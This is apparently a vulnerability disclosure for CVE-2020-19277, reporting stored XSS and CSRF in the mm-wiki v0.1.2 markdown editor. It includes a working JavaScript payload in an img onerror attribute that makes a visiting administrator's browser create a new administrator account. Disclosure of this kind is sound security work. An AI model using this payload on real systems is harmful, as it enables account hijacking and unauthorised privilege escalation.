Headline
CVE-2020-19277: Vulnerability: Stored XSS and CSRF · Issue #68 · phachon/mm-wiki
Cross Site Scripting vulnerability found in Phachon mm-wiki v.0.1.2 allows a remote attacker to execute arbitrary code via javascript code in the markdown editor.
Hello, I found two vulnerabilities: a stored XSS and a CSRF.
Attacker can exploit the vulnerability to execute malicious javascript on a document page and hijack the identity of other users (normal users or administrators).
The document editor does not filter or block the execution of Javascript, resulting in stored XSS. Any user browsing the document containing XSS malicious code will trigger the vulnerability.
Using the XSS vulnerability from the previous step, attacker can hijack the identity of other users. I recorded a GIF to demonstrate a normal user hijacking the super administrator’s identity to create a new administrator account.
<img src=# onerror=’eval(decodeURI(“var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);”))'>
Related news
Phachon mm-wiki v.0.1.2 vulnerable to stored cross-site scripting (XSS). This could allow a remote attacker to execute arbitrary code via JavaScript code in the markdown editor. Any user browsing the document containing XSS malicious code will trigger the vulnerability.